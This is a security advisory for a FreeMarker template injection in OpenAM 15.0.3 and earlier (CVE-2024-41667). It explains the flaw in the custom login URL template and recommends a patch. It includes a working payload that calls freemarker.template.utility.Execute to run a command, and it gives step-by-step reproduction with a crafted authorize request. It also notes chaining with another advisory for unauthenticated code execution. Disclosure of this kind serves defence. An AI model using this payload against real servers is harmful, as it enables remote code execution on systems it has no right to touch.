Skip to content

OpenAM FreeMarker template injection

High
vharseko published GHSA-7726-43hg-m23v Jul 24, 2024

Package

maven org.openidentityplatform.openam:openam-oauth2 (Maven)

Affected versions

<=15.0.3

Patched versions

15.0.4

Description

auth RCE in OpenAM<=15.0.3 latest

The vulnerability version:

<=OpenAM 15.0.3 latest

Vulnerability Description:

FreeMarker template injection
The reason I mentioned GHSA-4mh8-9wq6-rjxg in the description is because exploiting both vulnerabilities simultaneously achieves remote code execution without authorization.
This vulnerability can be exploited without CVE-2023-37471,This is a brand new vulnerability.

Vulnerability Cause:

The getCustomLoginUrlTemplate method in RealmOAuth2ProviderSettings.java is vulnerable to template injection due to its usage of user input.

image-20240722224758884

Although the developer intended to implement a custom URL for handling login to override the default login page,they did not restrict the CustomLoginUrlTemplate, allowing it to be set freely.

Normal CustomLoginUrlTemplate Belike:

http://mylogin.com/login?goto=${goto}"
                + "<#if acrValues??>&acr_values=${acrValues}</#if><#if realm??>&realm=${realm}</#if>"
                + "<#if module??>&module=${module}</#if><#if service??>&service=${service}</#if>"
                + "<#if locale??>&locale=${locale}</#if>

evil CustomLoginUrlTemplate

<#assign value="freemarker.template.utility.Execute"?new()>${value("calc")}

Vulnerability Reproduction:

1. Creating a Malicious OAuth Service

Create a new OAuth proxy.

image-20240722225842356

Configure the OAuth2 Provider

image-20240722225957100

fill the Custom Login URL Template field with the triggering payload

<#assign value="freemarker.template.utility.Execute"?new()>${value("calc")}

image-20240722230057934

2.Visit OAuth2 to trigger the payload

http://127.0.0.1:8080/OpenAM-15.0.3/oauth2/realms/root/authorize?client_id=1&scope=employeenumber&redirect_uri=https://github.com&response_type=code&csrf=AQIC5wM2LY4SfczyIULj2pD_csR6GSncuuxH2CEA7IIC0Ak.*AAJTSQACMDEAAlNLABM2MDY3NjE5NTU4NTgzMDk2MjM5AAJTMQAA*&max_age=200

Note:

The CSRF parameter is used to bypass CSRF attack detection,

Therefore CSRF parameter needs to match the iPlanetDirectoryPro parameter in the cookie.

The max_age parameter triggers the evaluation in isPastMaxAge(getMaxAge(request), authTime). In this method,

Copy CodemaxAge > -1 && maxAge <= currentTimeMillis() - authTime

Therefore, the max_age parameter needs to be tried with different numbers after -1 multiple times, such as max_age=100, max_age=200, and so on.

The overall attack path is as follows:

AuthorizationService.authorize ->
resourceOwnerSessionValidator.validate->
ResourceOwnerSessionValidator.authenticationRequired(request, token) ->
ResourceOwnerSessionValidator.authenticationRequired(OAuth2Request request)->
ResourceOwnerSessionValidator.buildDefaultLoginUrl->
loginUrlTemplate.process(templateData, loginUrlWriter)

The loginUrlTemplate template is created using the following:

new Template("customLoginUrlTemplate", new StringReader(loginUrlTemplateString),
                        new Configuration())

3.Vulnerability prove

image-20240722231334747

Repair Recommendation:

Utilize TemplateClassResolver.SAFER_RESOLVER to disable the resolution of commonly exploited classes in FreeMarker template injection.

Severity

High

CVE ID

CVE-2024-41667

Weaknesses

Improper Control of Generation of Code ('Code Injection')

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. Learn more on MITRE.

Credits